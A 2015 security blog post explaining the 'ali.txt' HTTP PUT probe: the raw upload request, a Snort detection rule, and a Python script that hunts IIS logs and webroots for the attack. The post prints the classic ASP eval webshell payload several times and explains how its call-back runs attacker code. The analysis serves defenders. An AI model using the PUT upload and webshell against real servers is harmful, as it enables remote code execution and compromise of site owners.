Friday, March 13, 2015

ASP Injection Attempt ali.txt Explained

I posted the basic details here but I wanted to go into more detail.

PUT /ali.txt HTTP/1.1
Accept: application/json
Content-Type: application/json
Content-Length: 39
Expect: 100-continue
Connection: Keep-Alive

alihack<%eval request("")%>

This probe has been around for a while and you may have seen the requests in your own logs, but what are they actually trying to do?

1.) First, the evil IP ( sends the attack request. Without further research it's difficult to tell whether this is truly the attacker's own server or a legitimate server that was compromised and is now being used to launch attacks on the attacker's behalf.

2.) Second, an IDS (intrusion detection system) sitting in front of the web server inspects the incoming requests and evaluates them against its Snort rules. This one fired because the request method was PUT and the URI was exactly '/ali.txt' (the rule's urilen:8 option requires the URI to be precisely those 8 bytes, so '/ali.txt.bak' or '/foo/ali.txt' would not match).

MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt (1:32875)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt"; flow:to_server,established; content:"/ali.txt"; http_uri; urilen:8; content:"PUT"; http_method; metadata:impact_flag red, service http; reference:url,; classtype:misc-activity; sid:32875; rev:1; )

3.) Third, if the web server accepts unauthenticated HTTP PUT requests (which should be rare on the Internet nowadays, but it still happens, usually through a WebDAV or misconfigured handler setting), then you have a major problem: anybody in the world can upload any file they want to your server simply by issuing a PUT request. A 201 Created or 200 OK response to the request below means the upload worked; a 405 Method Not Allowed means the server refused it.

PUT /ali.txt

4.) Fourth and finally, if the attack successfully uploads the 'ali.txt' file, the file will contain the old-school classic ASP one-liner below. The 'alihack' prefix is just a marker; the interesting part is <%eval request("")%>. When the attacker later calls back to yourwebsite/ali.txt and passes a parameter named "", whatever code is in that parameter gets eval'd, i.e. executed, on your server. This is essentially a webshell for ASP. One caveat: IIS serves .txt files as static content by default, so the code only runs if the .txt extension has been mapped to the ASP script engine or the attacker can rename the file to an .asp extension (for example with a WebDAV MOVE). Either way, the successful PUT alone already proves the server accepts arbitrary uploads. So check your web server: if you see ali.txt in the webroot, you know you've got issues and need to fix them.

alihack<%eval request("")%>

The requests may look something like this where EVILCODE is something the attacker is trying to run.
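The steps above describe three things a defender can check for: the request pattern the Snort rule matches, whether the server actually accepted the PUT, and whether the eval shell is sitting in the webroot. The following is an added example (my code, not from the original post or from the Snort rule authors) that re-implements the rule's matching logic over a raw request, hunts IIS W3C log lines for /ali.txt activity, and scans a directory for files containing the <%eval request(...)%> pattern. The HTTP request, the log lines and the webroot it scans are all constructed sample data; the function names are mine.

```python
"""Hunting for the ali.txt PUT probe and the ASP eval webshell it drops.

Added example, not code from the original post. It (1) re-implements the
matching logic of Snort sid 32875 over a raw HTTP request, (2) scans IIS
W3C-format log lines for requests to /ali.txt and reports whether a PUT was
accepted, and (3) walks a webroot looking for files that contain the
<%eval request(...)%> shell. All inputs below are constructed samples.
"""
import os
import re
import shutil
import tempfile
from typing import Dict, List


def matches_sid_32875(raw_request: bytes) -> bool:
    """Approximate the Snort rule: method PUT and a URI of exactly '/ali.txt'.

    The real rule also requires flow:to_server,established and $HTTP_PORTS;
    here we only evaluate the request line, which is what the content,
    http_uri, urilen:8 and http_method options test.
    """
    try:
        request_line = raw_request.split(b"\r\n", 1)[0].decode("ascii")
    except UnicodeDecodeError:
        return False
    parts = request_line.split(" ")
    if len(parts) < 2:
        return False
    method, uri = parts[0], parts[1]
    # urilen:8 means the URI must be exactly 8 bytes, i.e. "/ali.txt" and nothing more.
    return method == "PUT" and uri == "/ali.txt" and len(uri) == 8


# Constructed IIS W3C log excerpt (not a real capture). 201 on the PUT means the
# upload succeeded; the 405 is a server that correctly refuses PUT.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2015-03-13 02:11:45 10.0.0.5 PUT /ali.txt - 80 - 203.0.113.7 - 201 0 0
2015-03-13 02:11:46 10.0.0.5 GET /ali.txt - 80 - 203.0.113.7 - 200 0 0
2015-03-13 02:12:01 10.0.0.5 PUT /ali.txt - 80 - 198.51.100.9 - 405 0 0
2015-03-13 02:13:10 10.0.0.5 GET /index.html - 80 - 192.0.2.3 Mozilla/5.0 200 0 0
"""


def hunt_ali_txt(log_text: str) -> List[Dict[str, object]]:
    """Return every request for /ali.txt found in IIS W3C log text.

    The '#Fields:' directive names the columns, so the parser does not depend
    on one particular IIS logging configuration. 'uploaded' is True when a
    PUT was answered with a 2xx status, i.e. the server accepted the file.
    """
    fields: List[str] = []
    events: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != "/ali.txt":
            continue
        method = row.get("cs-method", "")
        status = int(row.get("sc-status", "0"))
        events.append({
            "time": f"{row.get('date')} {row.get('time')}",
            "client": row.get("c-ip"),
            "method": method,
            "status": status,
            "uploaded": method == "PUT" and 200 <= status < 300,
        })
    return events


# Matches the classic ASP eval shell regardless of spacing or case.
WEBSHELL_RE = re.compile(rb"<%\s*eval\s+request\s*\(", re.IGNORECASE)


def find_eval_webshells(root: str) -> List[str]:
    """Walk a webroot and list files whose content matches WEBSHELL_RE."""
    hits: List[str] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1_000_000)  # enough for any dropped shell
            except OSError:
                continue
            if WEBSHELL_RE.search(data):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def scan_sample_webroot() -> List[str]:
    """Build a throwaway webroot with one dropped shell and scan it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    try:
        with open(os.path.join(root, "ali.txt"), "wb") as fh:
            fh.write(b'alihack<%eval request("")%>')  # payload as shown in the post
        with open(os.path.join(root, "index.html"), "wb") as fh:
            fh.write(b"<html><body>hello</body></html>")
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "images", "notes.txt"), "wb") as fh:
            fh.write(b"eval request is just prose here, no ASP delimiters")
        return find_eval_webshells(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("IDS match:", matches_sid_32875(b"PUT /ali.txt HTTP/1.1\r\nHost: x\r\n\r\n"))
    for event in hunt_ali_txt(SAMPLE_IIS_LOG):
        print(event)
    print("shells found:", scan_sample_webroot())
```

Run it as-is and it reports one accepted upload from 203.0.113.7, the follow-up GET from the same client (the call-back), the refused PUT from 198.51.100.9, and the ali.txt shell in the sample webroot. Against real data, point hunt_ali_txt at your IIS log text and find_eval_webshells at the actual webroot; the log check tells you whether PUT is open, and the file scan tells you whether anything was dropped.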

Lock those servers down!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

revised 2/1/2018: not PHP but ASP, and a webshell, not just a test file